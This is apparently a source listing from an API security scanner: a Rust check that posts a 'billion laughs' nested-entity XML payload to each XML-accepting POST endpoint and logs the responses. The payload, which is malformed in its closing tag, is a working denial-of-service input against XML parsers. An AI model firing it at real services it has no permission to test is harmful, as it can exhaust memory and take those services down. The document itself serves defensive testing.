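This is a check suggested by @DeliciousBounty. It is currently not implemented, and will stay that way until testing levels are implemented, since it could be destructive: the nested-entity payload can exhaust memory on the server that parses it.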
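/// Sends a nested-entity ("XML bomb") document to every path that declares a
/// POST operation accepting `application/xml`, and records what came back.
///
/// The document defines ten entities, each referencing the previous one ten
/// times. A parser that expands them without a limit can consume a very large
/// amount of memory, so this check can degrade or crash the service under
/// test.
///
/// Exactly one request is sent per matching path: the body does not depend on
/// the individual schema entries of a path, so repeating the request for each
/// of them would only multiply the load on the target.
///
/// # Returns
/// A tuple of:
/// * the collected check results (one entry per response received, plus the
///   request/response log), and
/// * the elapsed time of every request attempt, including failed ones.
///
/// If the specification lists no server, nothing is sent and both parts are
/// empty.
pub async fn check_xml_bomb(&self, auth: &Authorization) -> (CheckRetVal, Vec<Duration>) {
    // Payload kept exactly as it appears in the original listing.
    let body = String::from(
        r#"
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz
"#,
    );
    let mut ret_val = CheckRetVal::default();
    let mut vec_time = vec![];

    // Resolve the target server once. A specification without servers gives
    // the check nothing to talk to, so return empty results instead of
    // panicking on an `unwrap`.
    let base_url = match self.oas.servers().into_iter().flatten().next() {
        Some(server) => server,
        None => return (ret_val, vec_time),
    };

    for oas_map in self.payloads.iter() {
        // Only a POST operation that declares an `application/xml` request
        // body is of interest; the first such operation on the path is used.
        let ops = oas_map.path.path_item.get_ops();
        let xml_post = ops.iter().find(|(method, operation)| {
            method == &Method::POST
                && operation
                    .request_body
                    .clone()
                    .unwrap_or_default()
                    .inner(&self.oas_value)
                    .content
                    .into_keys()
                    .any(|content_type| content_type == "application/xml")
        });
        let method = match xml_post {
            Some((method, _operation)) => *method,
            None => continue,
        };

        println!("ENCONDING {:?}", &oas_map.path.path);
        let content_type_header = MHeader {
            name: "Content-type".to_string(),
            value: "application/xml".to_string(),
        };
        let req = AttackRequest::builder()
            .uri(&base_url.url, &oas_map.path.path)
            .method(method)
            .headers(vec![content_type_header])
            .payload(&body)
            .parameters(vec![])
            .auth(auth.clone())
            .build();
        print!("XML BOMB : ");

        // Take the timing right after the request completes so that logging
        // and bookkeeping do not inflate the measurement.
        // NOTE(review): the meaning of the `true` flag passed to
        // `send_request` is not visible here — confirm.
        let start = Instant::now();
        let outcome = req.send_request(true).await;
        let elapsed = start.elapsed();

        match outcome {
            Ok(res) => {
                // Log request, response and a description of the test.
                ret_val.1.push(&req, &res, "Test for XML BOMB".to_string());
                println!(
                    "{}:{}",
                    "Status".green().bold(),
                    res.status.to_string().magenta()
                );
                // NOTE(review): every response received is recorded with this
                // alert text; receiving a response does not by itself show
                // that entities were expanded. Presumably the caller decides
                // from the status and the returned timings — confirm.
                ret_val.0.push((
                    ResponseData {
                        location: oas_map.path.path.clone(),
                        alert_text:
                            "This endpoint seems to be vulnerable to an XML bomb (entity expansion)."
                                .to_string(),
                    },
                    res,
                ));
            }
            Err(_) => println!("REQUEST FAILED"),
        }
        // Failed attempts are timed as well, one entry per request sent.
        vec_time.push(elapsed);
    }
    (ret_val, vec_time)
}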
This is a check suggested by @DeliciousBounty.
It is currently not implemented, and will stay that way until testing levels are implemented, since it could be destructive.